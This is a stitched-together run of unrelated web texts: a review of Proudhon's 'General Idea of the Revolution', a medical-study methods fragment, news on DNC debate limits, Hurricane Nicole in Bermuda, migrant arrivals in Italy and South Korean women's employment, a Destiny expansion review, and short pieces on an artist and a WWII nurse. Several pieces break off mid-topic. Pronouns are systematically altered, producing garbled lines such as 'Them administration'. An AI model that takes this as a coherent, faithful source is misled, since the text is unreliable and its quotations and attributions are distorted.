While not as famous as they once are , Proudhon was during their lifetime and for sometime after one of the world 's leading socialist thinkers . Kropotkin became a socialist after reading Proudhon , while Bakunin was a friend and proclaimed their anarchism as simply “ Proudhonism widely developed and pushed right to these , its final consequences. ” The General Idea was one of Bakunin 's favourite Proudhon works ( along with the sadly untranslated account of the 1848 revolution in France , “ Les Confessions D'un Révolutionnaire ” ) . Reading this classic of anarchism , it is easy to see why : it is the first constructive anarchist manifesto and raises such key libertarians ideas such as self-management , federalism , anti-statism and anti-capitalism .
Written in prison , in seven studies Proudhon sketches out the lessons of the events of 1848 and presents an alternative to save it and emancipate labour ( “ Capitalistic and proprietary exploitation , stopped everywhere , the wage system abolished ” ) . Needless to say , Proudhon spends some time addressing issues specific to 1851 France . However , there is much material within this work which is directly relevant to our situation in the 21st century and for libertarian alternatives to our capitalistic and statist oppression . Its Epilogue contains their justly famous and widely quoted rant against government :
“ To be governed is to be kept in sight , inspected , spied upon , directed , law-driven , numbered , enrolled , indoctrinated , preached at , controlled , estimated , valued , censured , commanded , by creatures who have neither the right , nor the wisdom , nor the virtue to do so .... To be governed is to be at every operation , at every transaction , noted , registered , enrolled , taxed , stamped , measured , numbered , assessed , licensed , authorized , admonished , forbidden , reformed , corrected , punished . It is , under the pretext of public utility , and in the name of the general interest , to be placed under contribution , trained , ransomed , exploited , monopolized , extorted , squeezed , mystified , robbed ; then , at the slightest resistance , the first word of complaint , to be repressed , fined , despised , harassed , tracked , abused , clubbed , disarmed , choked , imprisoned , judged , condemned , shot , deported , sacrificed , sold , betrayed ; and , to crown all , mocked , ridiculed , outraged , dishonoured . That is government ; that is its justice ; that is its morality . ”
This is one of the many joys in the book . All , though , need to be read to fully understand Proudhon 's thought . For example , while “ The Principle of Association ” sees them oppose “ Association ” it becomes clear from reading “ The Organization of Economic Forces ” that they were against the kind of centralised and compulsory “ Association ” of state socialist Louis Blanc and not against workers ' associations running industry :
“ Thus we need not hesitate , for we have no choice . In cases in which production requires great division of labour , and a considerable collective force , it is necessary to form an assocation among the workers in this industry ; because without that , they would remain related as subordinates and superiors , and there would ensue two industrial castes of masters and wage-workers , which is repugnant to a free and democratic society . ”
So when workers form co-operatives “ the importance of their work lies , not in their petty union interests , but in their denial of the rule of capitalists , money lenders and governments. ” There would be free access to the means of life , with land , workplaces and housing becoming communal property and possessed and run by those who use them , either individually ( for agriculture and artisans ) or collectively ( for industry ) .
Proudhon also critiques the state and its centralisation , refuting attempts to reform rather than abolish the state ( “ No authority , no government , not even popular , that is the Revolution ” ) . They advocate a radically decentralised and self-governing society of associations ( “ In place of laws , we will put contracts -- No more laws voted by a majority , nor even unanimously ; each citizen , each town , each industrial union , makes its own laws ” ) . They were well aware that the state was not neutral , that it existed to defend capitalism ( “ Laws ! We know what they are , and what they are worth ! Spider webs for the rich and powerful , steel chains for the weak and poor , fishing nets in the hands of the Government. ” ) . They call for the masses to transforms society from the bottom-up , by their own efforts and organisations .
While Proudhon is sometimes accused of racism ( thanks to a few anti-Semitic rants in their private notebooks ) , this is absent from their published works and so we find them proclaiming that there “ will no longer be nationality , no longer fatherland , in the political sense of the words : they will mean only places of birth . Man , of whatever race or colour they may be , is an inhabitant of the universe ; citizenship is everywhere an acquired right. ” In this area , as in many others , this book will make enlightening reading for anyone who thinks they know Proudhon from the stereotyping inflicted upon them by Marxists ( starting with Marx 's incredibly spiteful and usually inaccurate attack on them in “ The Poverty of Philosophy ” ) and those who read the secondary material influenced by such distortions .
While the reader will , rightly , question Proudhon 's reformism and their free credit panacea it becomes obvious why the likes of Bakunin , Kropotkin and Rocker thought so highly of the Frenchman and what modern anarchism owes them for many of its defining ideas and concepts .
Robert Graham 's introduction is excellent , giving a good summary of the Frenchman 's life and ideas . As far as the translation goes , Robinson systematically translates “ commune ” as “ town ” and “ salariat ” as “ wage system. ” Both are flawed , as “ commune ” can represent any habitation from hamlet to cities while “ salariat ” is better translated as “ wage-labour ” as Proudhon was in favour of distribution according to deed rather than need . Salariat specifically refers to a class of workers hired by a boss in return for a wage , i.e. , wage-workers or wage-slaves .
So , all in all a classic book which I think all anarchists will find of interest . I know that I was pleasantly surprised by their arguments against wage-labour and for workers ' self-management , their arguments against the state and for decentralisation and free federation and a host of other ideas which are nowadays usually associated with the revolutionary anarchism inspired by Bakunin and Kropotkin . Like their author , this work is not without flaws but it is a key text in anarchist thought and in the evolution of anarchism . It still has lessons for us seeking revolution in the 21st century .
Iain McKay
PS : I am currently working on a Proudhon anthology ( to be entitled “ Property is Theft ! ” ) to be republished next to mark the 170th anniversary of the use of anarchist in a positive light . If you wish to contribute to the translation of material from French to English , please contact me at : anarchistfaq [ at ] yahoo.co.uk
Jump to Section Introduction Materials and methods Study design Data collection Medical data Psychosocial/behavioural data Statistical analyses Selection of the study population ( patients and visits ) Outcome Explanatory variables Statistical methods Results Study population Causes of death Characteristics of the study patients Factors associated with mortality Discussion Coffee and mortality HCV clearance and mortality Study limitations Conclusions Financial support Conflict of interest Authors ' contributions ‡The ANRS CO13 HEPAVIH Study Group Supplementary data References
The all-cause mortality rate was computed as the number of deaths occurring between M0 and M72 divided by the number of person-years during the study period ( computed as the sum , for all patients , of the number of years between entry date and latest news date , i.e. , death , the latest news visit or censoring ) . The ‘ last observation carried forward ' method was used to impute the values for the explanatory variables when they were missing ( i.e. , at clinical visits without self-administered questionnaires ) .
The association between baseline coffee consumption and mortality was assessed after adjustment for potential predictors and confounding factors , using a Cox proportional hazards model with robust standard errors . Potential adjustment variables with a p value < 0.20 ( Wald test ) in the univariate analyses were considered eligible for inclusion in the multivariable analysis . A backward selection procedure , based on the Wald test , was then used to identify the adjustment variables in the final multivariable model ( variables were considered significantly associated with the outcome if the p value ≤0.05 ) . The final multivariable model was adjusted for gender and age , irrespective of their p values . The presence of confounding factors was evaluated by removing each non-significant variable , one at a time , and noting the effect on the coefficients for the remaining variables ( the eliminated variable was considered to be a confounder and included in the final model if at least one of the coefficients for the remaining variables changed by more than 25 % ) . The proportional hazards assumption was tested in the final multivariable Cox model by examining the rescaled Schoenfeld residuals.31x [ 31 ] Grambsch , P.M. and Therneau , T.M . Proportional hazards tests and diagnostics based on weighted residuals . Biometrika . ; 81 : 515–526
Crossref | Scopus ( 2585 ) | Google ScholarSee all References
In order to verify whether different follow-up durations could have an impact on our results , we identified two subgroups of patients with different follow-up durations ( last follow-up visit < 48 months vs. last follow-up visit ≥48 months ) and performed a secondary analysis using a shared-frailty Cox model , each subgroup having a specific baseline hazard ratio ( HR ) . Further details about the shared-frailty Cox model are provided elsewhere.32x [ 32 ] Protopopescu , C. , Raffi , F. , Spire , B. , Hardel , L. , Michelet , C. , Cheneau , C. et al . Twelve-year mortality in HIV-infected patients receiving antiretroviral therapy : the role of social vulnerability . The ANRS CO8 APROCO-COPILOTE cohort . Antivir Ther . ; 20 : 763–772
Crossref | PubMed | Scopus ( 6 ) | Google ScholarSee all References
Stata/SE 12.1 software ( StataCorp LP , College Station , USA ) was used for all the analyses .
For further details regarding the materials used , please refer to the CTAT tableCTAT table .
A presidential campaign advisor says the Democratic National Committee plan to restrict debates will be ‘ unenforceable ' and will ‘ fall apart '
An advisor to a presidential campaign has accused the Democratic National Committee of “ not negotiating in good faith ” over plans to limit the number of debates in the party 's 2016 presidential primary .
The DNC announced on Tuesday that it would only authorise six debates in the party 's 2016 primary , 22 fewer than the number held in 2008 . Starting in October , each of the four states holding early nominating contests ( Iowa , New Hampshire , South Carolina and Nevada ) will each hold one debate as will two other states to be determined .
The DNC will also introduce an “ exclusivity clause ” which would ban candidates from official debates if they appeared in ones which it had not sanctioned .
However , according to the campaign advisor , the DNC had originally ruled out an exclusivity clause saying it was “ undemocratic ” and such a rule would be “ unfair and too punitive ” .
The aide claimed the DNC had not “ negotiated in good faith with campaigns ” and that “ the cake was baked ” from the start . The advisor predicted that “ the DNC is going to find the schedule unenforceable . It will fall apart ” .
The Republicans were the first to use an exclusivity clause . They wanted to avoid a repeat of a problem seen in 2012 when the inclusion of fringe candidates in televised debates forced establishment candidates to pivot to the right and take positions that would not be appealing in a general election .
Mo Elleithee , the communications director for the DNC , said : “ We realized every now and again that the Republican Party has good ideas . ”
The DNC also defended the limit on the number of debates . Elleithee referenced the myriad of debates in the 2008 Democratic primary and said when debates are that frequent “ it begins to overwhelm the processes , becomes all consuming for campaigns and becomes less impactful for voters .
Elleithee defined a debate that would violate the rule , as opposed to a forum , as a situation where candidates were interacting and on the stage at the same time . While they declined to get into the internal workings of the DNC and how this comes about , they noted “ all decisions come through the chair . ”
The exclusivity clause was not the only new rule this year . The DNC is also going to implement “ a uniform criterion for inclusion ” so that candidates would n't have to face moving goal posts to enter each debate .
The various Democratic campaigns responded in different ways to the DNC 's announcement . Spokespeople for both former Senator Jim Webb and for former Governor Martin O'Malley seemed less than pleased with the DNC 's statement .
Craig Crawford , a spokesperson for Webb , told the Guardian : “ We really are n't focused on debates right now , have not even discussed them internally , or externally . Would n't it be surprising if Iowa Dems accept just one debate ? ”
Lis Smith , a top O'Malley aide , issued a statement saying “ If Governor O'Malley decides to run , we will expect a full , robust , and inclusive set of debates—both nationally and in early primary and caucus states . This has been customary in previous primary seasons . In a year as critical as 2016 , exclusivity does no one any favors . ”
In contrast , Hillary Clinton 's campaign issued a positive tweet about the debate saying they were on board with the DNC 's plan .
Tad Devine , a strategist for senator Bernie Sanders , said that they had only heard from the DNC about debate rules on Tuesday .
The veteran operative said that they had never heard the Democratic Party using the exclusivity rule before and called it “ a new wrinkle. ” They thought debates were important and had concerns about the DNC presenting these rules as a “ fait accompli. ” However , Devine made clear “ certainly nobody beefs about it ” and that they had little desire to have “ a debate about debates. ” They simply thought that eventually campaigns could “ talk to each other to find some common ground and the party would be receptive to agreements negotiated ” between the respective campaigns .
In contrast to the Democrats , the Republican party is scheduled to hold between nine and twelve different debates and the first will be held in August .
[ Updating ] The island is continuing restoration work following Hurricane Nicole , which passed over the island as a major hurricane on Thursday , with the Bermuda Weather Service confirming that a gust of 118kt [ 136mph or 217km/hr ] was the maximum wind speed recorded during the hurricane .
Extensive restoration has already been completed , and we will continue to update this post until Saturday [ Oct 15 ] evening with remaining information on the recovery efforts . You can see all our coverage of Nicole here , and download our free app to receive warnings and breaking news alerts delivered directly to your phone .
Key Points as of 6.00pm Sat Oct 15
BELCO : 2,734 without power as of today
Digicel : Restored 98 % of network , expect to return full service on Saturday
CellOne – 95 % coverage | Logic Cable & Internet – 66 % restored .
Airport & Causeway : Both are open
Ferries : Resumed service on Saturday
Buses : Except for 2 routes [ 1 & 8C ] service will resume on Saturday
Waste : Garbage collection resumed as normal today
Government : Govt offices will be open on Monday
Bermuda College will resume all classes on Monday
Schools : Govt said , “ Currently assessing our Government schools ; which includes an assessment of power and structural damage ; and we are aiming to have schools reopen on Monday . We will confirm that with the public on Sunday . ”
Updates have concluded , and are available below :
Read More About
Category : All , News
A migrant child looks through a porthole as they wait for the MV Aquarius , a search and rescue ship run in partnership between SOS Mediterranee and Medecins Sans Frontieres , enters Pozzallo on the island of Sicily , Italy , December 18 , 2017 . REUTERS/Darrin Zammit Lupi
ROME ( Reuters ) - Migrant arrivals to Italy by sea fell by a third in 2017 compared to a year earlier , the Interior Ministry said on Sunday , as Libyan authorities helped to slow departures during the second half of the year .
More than 119,000 came to Italy by boat this year after a record 181,000 made the crossing in 2016 , the ministry said in a statement . Since July , arrivals have declined by more than two thirds versus a year earlier .
“ We were able to govern the flow because we were the first to believe that an agreement with Libya was a turning point , ” Interior Minister Marco Minniti said in an interview with Corriere della Sera , commenting on the decline .
In February , Italy signed an agreement with the United Nations-backed government in Tripoli , promising aid , equipment and training in exchange for its help in fighting people smuggling . The deal was endorsed by the European Union .
Since then , armed groups supported by the Tripoli government have forced smugglers in the city of Sabratha - a key hub on the western coast - to stop sending out boats . Italy has also bolstered the Libyan coastguard 's ability to turn back boats .
But rights groups and humanitarian organizations operating rescue ships in the Mediterranean have criticized the policy , saying that it traps migrants in a country where they face appalling treatment , including rape , torture and forced labor .
While criticized by some , the figures are considered good news for the ruling Democratic Party ( PD ) ahead of a national election in March . More than 600,000 migrants have reached Italy by boat over the past four years , making immigration a hot-button political issue .
More than 20,000 are estimated to have died attempting the crossing to Italy , the International Organization for Migration ( IOM ) estimates , making it the deadliest border for migrants in the world .
But deaths at sea have declined as well , according to the IOM , with 2,833 this year , down more than 38 percent from 4,581 last year .
PCU 's first impressions on the long waited new Destiny expansion
Destiny to me at least is a divisive game , either you 're a devoted fan or you 'd prefer to play almost anything else . Upon the initial release of the game in September 2014 many gamers abandoned it . Destiny , at launch , suffered from a lack of stories , lack of in game diversity in terms of activities and a lack of a compelling adversary . This coupled with a complicated character progression process and a player v player mode that was easily frustrating produced a game that had limitless potential but failed to be the revolutionary experience that many thought it might be . The Taken King expansion and the Destiny 2.0 Software Update address many of issues , its not an exaggeration to say that this is a different game than the one I played last year . In almost every way possible the expansion addresses the original deficiencies and gives players a more interesting world to play in . While its not a panacea for all that ails Destiny , It 's hard not to be enthusiastic about this version of the game .
The Taken King introduces Oryx , the father of Crota , the “ Big Bad ” of the Dark Below expansion . Oryx of course is taking revenge for the death of Crota in the Crota 's End raid . Oryx is n't the first real villain in Destiny ; that distinction belongs to Skolas from the House of Winter , however Oryx is the best one so far . There is a genuine sense of menace and foreboding that is created by every appearance . Without spoiling the initial opening sequence of the Taken King , they advance the overall Destiny story more in 30 seconds that almost all of the year one content . This is definitely a positive development after months of fighting the Darkness , the thing that ended humanity 's golden age , which is still not clearly defined or explained in game .
In addition to the presence of Oryx , the Taken themselves are the best Bungie adversaries since the “ Flood ” of the Halo series . Comprised of members of all of the previous Destiny villains ( the Fallen , the Hive , Vex , and Cabal ) they are formidable adversaries , ones that gamers will enjoy dispatching . I initially thought that brand new enemy class was what Destiny needed , but by giving preexisting adversaries new abilities Bungie was successful in achieving the same effect . Taken Vandals can now throw up shields like Defender Titans , but they can shoot through the shield , meaning that a player will have to rush them . Taken Knights can now shoot an arc of fire at Guardians no matter how far away they are . Taken Psions with their ability to duplicate if not killed quickly are an immediate threat . The Taken truly look supernaturally possessed and the idea that they have no free will and are completely controlled by Oryx “ similar to Harbinger in Mass Effect 2 ” truly live up to the idea that this army has been built to destroy you personally .
In addition to new villains the Taken King gives the Titans , Hunters , and Warlocks , new subclasses to fight the Taken with . Titans get the Sunbreaker class , Hunters get the Nightstalker , and Warlocks get the Stormcaller . I 've only played with my Titan , so I 'm uninformed about the other classes , but if you think throwing a flaming hammer at the enemies of Earth sounds cool , you 'd be absolutely correct . I ca n't stress enough how fun it is to explore this new subclass and it genuinely has me excited to play the game , a feeling I truly have n't felt since launch .
New adversaries and abilities alone would have represented significant changes , however a more fundamental change is the one that has been made to character progression . The Destiny 2.0 software update , released just prior to the expansion , changed how players will level up their characters . Character progression now is clearly understandable , play the game and your character will continue to gain experience and level up all the way to level 40 . When I originally played Destiny after reaching level 20 it was initially unclear how to raise my character 's “ light level ” . Eventually I was able to continue my character 's development but I had to grind to obtain the armor that was needed to raise my light level . The light level is now a combination of both your cumulative attack and defense scores , not just your armor . I should add that now new weapons and armor seem plentiful where previously it felt like an eternity before you got useful new weapons and equipment . I wish the level cap had been raised higher , maybe 44 , just to give me more to do until the next expansion but I 'm willing to deal with it based on the revised progression system .
On the topic of weapons and equipment , anyone with any experience playing Destiny knows that Exotic weapons and armor are at the heart of Destiny ; they are the loot that players dream , lust , and curse over . Bungie was in the unenviable position of having to decide the fate of the exotics from Year 1 and determine what if anything should be carried over . I feel they did the best they could and allowed players to keep all exotics they had earned , automatically completed any exotic quests for players that were still uncompleted at the time of the switch , and allowed for the creation of a limited number of Year 2 versions of old exotics . There is no way to please everyone and obviously some gamers are going to be affected . Players who loved the hand cannon Thorn and Gjallarhorn are destined to be disappointed . Xbox One players can try out both the Monti Carlo and Hawkmoon exotics that were previously Playstation exclusives . The net result is that you get to keep some of what you love but have to make space for the new exotics .
Players of The Taken King will also experience some much appreciated changes to the bounty system . In the original version of Destiny , players had to come back to the Tower to turn in bounties and the bounties themselves were n't so enjoyable . Now you can remain on patrol , story mission , or raid actively playing the game and trade in bounties . In addition , bounties true to Bungie 's promise have been restructured so you can do the things you want to do in game . Previously , many bounties consisted of “ Kill X things you 've killed 12 times on heroic mode ” . Now a typical bounty now is “ Kill 50 Vex ” , “ Melee 30 enemies without dying ” . It sounds like a small thing , but it produces major dividends . I was able to progress my character playing the in-game content I wanted to play , which is always a good thing .
Quests are a new addition to Destiny but are definitely a valuable one . Quests are given by individual members of the Vanguard , Eris Morn , Petra Venj , and others and occupy a new screen , and displayed to the left of bounties . I have n't had the opportunity to play the game from the beginning again since the new changes , but Bungie has explained that the result of this new quests is that the single player story portion of the game has better structure and flows better . I have n't completed any yet , but again It 's great to have more content in-game to explore .
There 's more to do at the Tower , one of Destiny 's two social hubs . You can take weapons prototypes into the field to gain reputation with Banshee-44 . Also you can talk to the gunsmith to be able to order new weapons on “ Armsday ” every Wednesday . All of the NPCs at the Tower , seems like they have been put to better use . Master Raghool the Cryptarch now sells Legendary Engrams for Legendary Marks that can be earned through Vanguard Strikes and other activities . The three factions , Future War Cult , New Monarchy , and Dead Orbit still exist but it 's easier to change allegiance ( only once per week ) and gain reputation , which of course leads to more loot .
While I enjoyed playing through the expansion I still have my concerns and frustration about the game . The Crucible continues to an unenjoyable experience and it continues to be the one glaring problem with the game for me . I 'm a pretty experienced Call of Duty player but achieving a 2 to 1 kill to death ratio still feels extraordinarily painful . Bungie has stated that better matchmaking will be delivered to the Crucible via an upcoming software patch , so hopefully that will improve the experience . The story is still lacking in parts , but to be honest , there is more story here than in the entire original version of Destiny .
The cumulative result of all these additions and changes , minor and major is a better , more enjoyable , more engaging game to play . Is the expansion worth $ 40 to existing players and $ 60 to new players ? Yes , with this caveat : I think established players will get more out of the game . Jumping into Destiny at this point is like watching the Star Wars trilogy starting with Return of the Jedi . If you 're a new player you 've missed the experience of fighting with the rest of the Destiny community as The Dark Below , which really serves as the basis for The Taken King was released . You also missed out on the House of Wolves and playing The Prison of Elders with the larger community . The content is still there , but the Destiny community itself will be focused on the new content and the new raid “ King 's Fall ” which is released on September 18 .
Ultimately The Taken King brings Destiny closer to the original vision that Bungie gave us . I 'm excited as a player not just for this expansion but for the future of this franchise .
4 Warlocks out of 5
Advertisements
Amber Randall , DCNF
The Women 's March is selling tickets to its Inaugural Women 's Convention , an event aimed at female liberation , for almost $ 300 .
The Detroit convention will bring women together to learn about issues like civil rights , abortion , immigration , and how to fight racism in America for $ 295 a ticket .
“ General admission is $ 295 per person—an amount necessary to help us cover the expense of holding a conference . Youth and student registration is $ 125 per person . If your employer is paying your registration , please register at the institutional level , $ 365 per person , ” the Eventbrite pages reads .
Children are more than welcome to attend , organizers said , and those under 12 can get in free of charge . Tickets for children 12 and older cost $ 125 , they added .
The event , running from Oct 27-29 , plans to focus on teaching women about issues on such as “ reproductive justice , the issue of the most “ misogynistic presidential administration in decades , ” as well has how to fundraise and how to be an ally . The convention also plans to come up with a special program geared toward young children .
“ Tapping into the power of women in leadership as the fundamental , grassroots force for change , the Women 's Convention will bring together first time activists and movement leaders , rising political stars that reflect our nation 's changing demographics , and thousands of women who 've organized sister marches , huddles , rallies and resistance actions , large and small , since January 2017 , ” according to the event page .
The Women 's March did have a scholarship fund , but it has closed all applications . For those who are unable to make the event , the march can not offer refunds anymore , but suggests that people donate their ticket to another activist .
“ Unfortunately the deadline for refunds has passed . If you are unable to attend the convention and would like to donate your ticket to another activist , please let us know , ” the event page reads .
Follow Amber on Twitter
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience . For licensing opportunities of our original content , please contact [ email protected ] .
Australia 's first female Muslim federal MP Anne Aly has fallen victim to fake news after an unsubstantiated story about their `` refusal '' to lay a wreath on Anzac Day appeared on a Facebook post .
It 's a lesson on how fast rumour travels , gains traction and becomes the alternative truth - at least on social media .
It began after the Kim Vuga Love Australia or Leave Party Facebook page made a post at 8.30pm on Anzac Day , headed `` a must-read '' . It shared a story purportedly from a friend referred to as `` Gary '' who had been at a dawn service for the Wanneroo RSL sub branch in the northern suburbs of Perth . `` Gary '' says they were `` taken aback '' to hear that the local Member , Anne Aly , would not be presenting a wreath .
South Korea 's Deputy Prime Minister Hyun Oh-seok ( who is also the Minister of Strategy and Finance ) met with foreign journalists last month to promote the president 's long-term economic goals . From market deregulation to fostering new industries , the “ Three-Year Plan for Economic Innovation ” attempts to reinvigorate South Korea 's future economy with various policies including female employment .
Since their election campaign , South Korean President Park Geun-hye has championed childcare support as the central solution to increase economic participation among women . Them administration has maintained this strategy , making it their leading policy for women 's rights .
In their keynote speech for the 3-year plan , Minister Hyun used one sentence to specify how the government will improve female employment , “ [ C ] ustomized childcare support , and promoting flexible work-hours . ”
The Park administration 's basis for focusing on childcare derives from what economists call , “ the M curve , ” which outlines the tendencies of working South Korean women . In their 20s , females have a higher labor force participation rate than their male counterparts ( as well as a higher college graduation rate ) . But in their 30s , this number significantly declines and does not pick up until they are over 40 .
From ages 30 to 39 , economic participation among South Korean women is one of the lowest globally , according to a report by the World Economic Forum ( WEF ) in 2013 , ranking 111th out of 136 countries for gender gap . Only one out of three women work during their 30s , citing difficulties balancing work and family life . “ That is why we are providing a lot of policies supporting childcare , ” affirmed Hyun , “ We are giving the most support for childcare compared to any other previous administration . ”
However , the government is using childcare as a measure for equality to veil an ulterior motive : to encourage childbearing with policies that reinforce conservative gender norms .
In a nationwide survey conducted by the Federation of Korean Industries in 2010 , marriage was the leading cause for South Korean women to quit their jobs – not childrearing . According to the poll , females in general have a 37.8 percent higher chance to give up work after getting married than if they were single – a percentage that shoots up to 58.2 for those in their 20s . The likelihood , however , of married mothers to leave their jobs was only 2.9 percent higher than married women without children . The federation explains these statistics by saying it is due to the foundational social belief that females should be full-time homemakers .
This is further observed in a recent study conducted by the Organization for Economic Cooperation and Development ( OECD ) , which found that among developed countries , South Korea ranked lowest in sharing of housework . The study found that on average , married men in South Korea spend a total of 45 minutes daily doing housework–10 minutes of which go into childcare .
Despite these numbers , measures to change cultural expectations – that it is not only the woman 's responsibility to care for children – are being opposed . In January , the Ministry of Labor and the Ministry of Strategy and Finance rejected one of President Park 's campaign promises : mandatory paid paternity leave , or “ Father 's Month. ” Ministry officials quoted potential financial problems such as the depletion of employment reserve funding for the opposition against the bill . They added that they will work towards a resolution but are unsure how they will initiate it .
Still , the government is taking measures to make childbearing appealing . Under the new guidelines for employment support , families with a second child will not only receive 100 percent paid paternity leave but will also be guaranteed 100 percent maternity leave without reductions . In addition , the government decided in March to reduce daily working hours for pregnant women by 2 hours – only applicable for those in their 1st or 3rd trimester .
All these , however , are additive to the “ Three-Year Plan for Economic Innovation. ” During the speech for their one-year anniversary as president , Park Geun-hye presented the plan to the public for the first time .
“ It is my political conviction that I must work to achieve a second miracle on the Han River to place our economy on a rock-solid foundation and usher in an era of happiness for the people , ” the last bit being the motto for the economic plan . This speech , in its intelligent writing , has many implications and uses nostalgia to invoke hope . The so-called “ first miracle on the Han River ” was lead by Park Geun-hye 's father , President Park Chung-hee , who led the nation through dictatorial rule from 1961 until their assassination in 1979 . Despite their controversial rule , many view their leadership in a positive light for the economic prowess it has brought to the country . The miracle is accredited to South Korea 's strong work ethic , which utilized the country 's large baby boomer population to pull itself out of poverty from the aftermath of the Korean War . And this is the precursor , a crucial point , for miracles to happen on the Han River : having a viable workforce .
Currently , South Korea is considered a super-aging society – the fastest in the world . Due to the country 's low fertility rates and expanded life span , the population is becoming less and less competitive . By 2050 , the median age of the country will be 57 while the youth population will be half its present number . So the government is frantically working to increase the population . According to Minister Hyun , “ One of [ our many challenges ] is the potential decline in the working population so female employment is viewed with the utmost importance. ” But rather than viewing female employment as a solution to the country 's population problem , striving for women 's equality as a basic cause could naturally solve many of the country 's dilemmas .
With traditional household dynamics – the man as the breadwinner – the fertility problem remains unsolved . One of the main reasons South Korean families choose to have fewer babies is the high cost of raising children . Couples want financial stability but with a one-person income , raising even one child presents its own hardships . South Korea now has almost exactly as many females as males – the closest the two populations have been since such data was recorded . Another way put , there is potential for multiple breadwinners . But on top of low economic participation marks , the WEF ranking of South Korea is a result of the lack of women 's representation in decision-making positions . It would be more precise to describe South Korea 's glass ceiling as a concrete roof . Less than 1 percent of the country 's CEOs are women ; the gender pay gap is the highest in the OECD at almost 40 percent ; but policies to support women primarily emphasize childcare , cementing their roles only as mothers .
Other policies outside childcare are open-ended and only planned for the short-term . When asked how the government would ensure women 's job security and upward mobility , Minister Hyun replied , “ [ W ] e would have to encourage companies to change their positions or regulations regarding promotions , ” which means it would not be mandatory . This is similar to what President Park said in their anniversary speech for flexible work hours for pregnant women .
“ In order to increase the number of jobs ideal for women , it is urgent that we renew efforts to push part-time jobs with flexible working hours . For this reason , the Government will give full-time workers the right to opt for part-time working arrangements if working hours need to be reduced because of childcare , pregnancy or other caretaking responsibilities , ” says Park , but ends with , “ We will expand opportunities for them to receive priority consideration when applying for newly available full-time positions. ” Simply put , flexible work hours need to be available for potential mothers but after the decision to go part-time , their previous positions will not be guaranteed .
This rhetoric also translates into the funding of the “ Three-Year Plan for Economic Innovation , ” where money for childcare is the only policy guaranteed until 2017 . Other measures that could impact the working environment on the other hand , including leave benefits , maternity protection , reemployment , and tax breaks for hiring able mothers will only be available this year .
These traditional ideologies are embedded in President Park Geun-hye 's administration . Only one female , the Minister of Gender Equality and Family , stands in their 17-member cabinet . But according to the Deputy Prime Minister , “ The mere fact that the South Korean president is a woman shows that this country is highly committed to improving the job situation for women . ”
An Egyptian soldier passed away today , 10 September , in a military hospital after being shot at the Israel-Egypt border three weeks ago . This raises the number of Egyptian soldiers who were killed in the Israeli cross border raid raid on Thursday , 18 August to six .
The soldier , Emad Abdel Malak , was shot while driving the car carrying the other soldiers killed by the Israeli forces . Israel claimed its forces were chasing militants that had attacked and killed Israelis on a bus in the area .
The Egyptian public was outraged and thousands of protesters demonstrated for days before the Israeli embassy , with one of their number succeeding in climbing up the front of the high-rise apartment building housing the Israeli embassy , and bringing down the Israeli flag . Protesters demanded that the Israeli Ambassador be sent out of Egypt and a joint investigation into the border incident launched .
Demonstrations against the Israeli embassy resumed Friday , as thousands collected around the building housing the embassy , dismantled a high concrete wall that had been erected around it a week before , the protest climaxing around midnight in a break in into one of the embassy 's apartments , with the protesters seizing thousands of documents and hurling them out of the windows .
Fierce clashes between protesters and anti-riot squads ensured in which over a thousand protesters were injured and three killed .
Short link :
Starting their creative career as a street artist , Craig Alan developed their portraiture skills while earning a living to further fund their artistic pursuits . Since that point , the artist has been honing in on their craft and creating something more than your average portrait . They represent people as an amalgam of other people . The artist 's portfolio boasts a series of inventive portraits of iconic figures whose visage appears to be composed of tiny pixels . Upon closer inspection , the spectator can see that the pixels are , in fact , people .
Though the interpretation is left up to the viewer , there is clearly a link between pop culture or historical idols and the general public . Perhaps these tiny bodies represent the fans that make the actors and pop stars the powerful forces that they are or maybe it alludes to the fact that we are all connected . Whatever the case may be , the portraits are brilliantly executed , utilizing every minute figure and his/her shadow to represent the entity .
Craig Alan on Vinings Gallery
via [ Ruines Humaines ]
10PM : Utah nurse 's escape from Albania in WWII documented in 'The Secret Rescue '
VIRGIN , Washington County — An Army nurse from Utah crash-landed in Albania in World War II , along with a dozen other nurses . They lived by their wits behind Nazi lines for several months , aided and hidden by anti-Nazi partisans .
When Clarann Porter Hughes was a little girl , they rarely saw them Aunt Helen , but they keep a photo on display all the time .
`` I 'll never forget her , ” Hughes said .
Helen Porter was usually away on military duty , but they often sent packages .
“ She also sent me a box of their blue nursing uniforms to dress up in , ” Hughes remembered .
Porter was involved in one of the most remarkable rescue operations of World War II .
It was a big story back then — Army nurses rescued from behind enemy lines .
Most of the details were kept secret or falsified . One report said the nurses were in Yugoslavia . They were actually hiding out in Albania .
As recounted in a recent book , `` The Secret Rescue , '' the nurses ' ordeal began in November 1943 when 13 American nurses and 13 medics were on a flight to Bari , Italy .
“ They got caught up in a storm and before they knew it , they had crossed the Adriatic , ” Cate Lineberry , author of `` The Secret Rescue , '' said . “ ( They ) were running out of gas . ”
“ They started shooting at us . We were forced to crash-land in Nazi-occupied Albania , ” said Harold Hayes , the last living survivor at the time Lineberry wrote in their book .
For two months , the main group traveled hundreds of miles through Nazi-controlled territory .
“ I think they really had luck on their side , ” Lineberry said . “ There were so many instances of near misses , near death experiences . ”
`` The Secret Rescue '' details the story of 13 American nurses and 13 medics on a flight to Bari , Italy when they were forced to crash-land in Nazi-occupied Albania .
They were escorted and sheltered by anti-Nazi partisans , communists , who eventually led them to a rendezvous with British and American rescuers .
Very early on , Porter and two other nurses were separated from the main group during a Nazi attack .
The trio of nurses spent five months behind enemy lines . They survived mainly because a prominent , wealthy Albanian family took great risks to help the Americans .
“ They had a secret room in the basement where they hid them , ” Hughes said . “ But there were Nazis that established themselves right across the street from the house . ”
Partisans were able to smuggle Porter and the other two nurses out dressed as Muslims . Details were kept secret for decades .
“ She appeared at our house one day , ” Hughes remembered . “ They said that they had been freed , and that they had been smuggled out of Albania by the people who lived there . ”
For decades after the war , U.S. officials worried that those who helped the Americans might face retribution .
“ We were not to talk to anybody about where we had been , anyone who had helped us and how we escaped , ” Hayes said .
Helen Porter married after the war . They completed a career in the military and died of cancer at age 55 .
“ I do n't know if you 'd call them a hero , ” Hughes said . “ But they were certainly courageous . ”
×
Photos
Related Links
Related Stories
Last week , I was scouting in the Middle Village/Glendale area of Queens when I realized I was close to an address I 'd been meaning to check out . Only thing was , as I pulled up to the house , I could n't remember why I 'd written it down .
Over the years , I 've saved up a number of Google Maps bookmarks of New York sites I should stop by if I ever happen to be scouting in a particular neighborhood . But what was so special about the non-descript house at 89-70 Cooper Avenue ?
